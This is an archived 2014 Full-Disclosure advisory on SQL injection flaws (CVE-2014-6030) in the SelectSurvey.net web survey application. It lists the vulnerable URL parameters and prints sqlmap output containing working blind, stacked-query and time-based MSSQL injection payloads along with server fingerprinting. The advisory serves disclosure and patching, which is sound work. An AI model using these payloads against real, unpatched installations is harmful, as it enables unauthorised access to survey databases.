lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <5419986C.2050408@varhol.net>
Date: Wed, 17 Sep 2014 10:19:24 -0400
From: BillV-Lists <lists@...hol.net>
To: fulldisclosure@...lists.org
Subject: [FD] Multiple SQL Injection Vulnerabilities in ClassApps
	SelectSurvey.net

Details
==========
Software: ClassApps SelectSurvey.net
Description: Multiple SQL Injection Vulnerabilities
Version: 4.124.004
Homepage: https://www.classapps.com/SelectSurveyNETOverview.asp
Vendor Fix: 4.125.002
CVE: 2014-6030

Timeline
==========
Aug 28 2014 - Vendor Notified
Aug 28 2014 - CVE Requested
Aug 28 2014 - Vendor Response
Sep 01 2014 - CVE Assigned
Sep 01 2014 - Upgraded Version Released
Sep 17 2014 - Disclosure

Description
==========
SelectSurvey.net is a web-based survey application written in ASP.net
and C#. It is vulnerable to multiple SQL injection attacks, both
authenticated and unauthenticated. The authenticated vulnerability
resides within the file upload script, as the parameters are not
sanitized prior to being placed into the SQL query. ClassApps had
previously listed 'SQL injection protection' as a feature and did have
several functions in place to attempt to prevent such attacks but due to
using a "blacklisting" approach, it is possible to circumvent these
functions. These functions are used elsewhere throughout the application
to protect GET request variables but are not sufficient. Only this
specific version of the application has been tested but it is highly
likely these vulnerabilities exist within prior versions. It has not
been confirmed that these vulnerabilities are fixed. The vendor stated
that they would be fixed in this new release however, they do not allow
download of the code unless you are a customer so fixes have not been
verified.

Examples
==========
/survey/ReviewReadOnlySurvey.aspx?ResponseID=<num>&SurveyID=[SQLi]
(unauthenticated)
/survey/UploadImagePopupToDb.aspx?ResponseID=<num>&SurveyID=[SQLi]
(authenticated)

sqlmap identified the following injection points:
---
Place: GET
Parameter: SurveyID
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: ResponseID=1&SurveyID=1' AND 4002=4002 AND 'dLur'='dLur

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: ResponseID=1&SurveyID=1'; WAITFOR DELAY '0:0:5'--

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: ResponseID=1&SurveyID=1' WAITFOR DELAY '0:0:5'--
---
[14:01:39] [INFO] testing Microsoft SQL Server
[14:01:39] [INFO] confirming Microsoft SQL Server
[14:01:39] [INFO] the back-end DBMS is Microsoft SQL Server
[14:01:39] [INFO] fetching banner
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.5
back-end DBMS operating system: Windows 7 Service Pack 1
back-end DBMS: Microsoft SQL Server 2008
banner:
---
Microsoft SQL Server 2008 R2 (SP2) - 10.50.4000.0 (X64)
    Jun 28 2012 08:36:30
    Copyright (c) Microsoft Corporation
    Enterprise Edition (64-bit) on Windows NT 6.1 <X64> (Build 7601:
Service Pack 1)
---




_______________________________________________
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ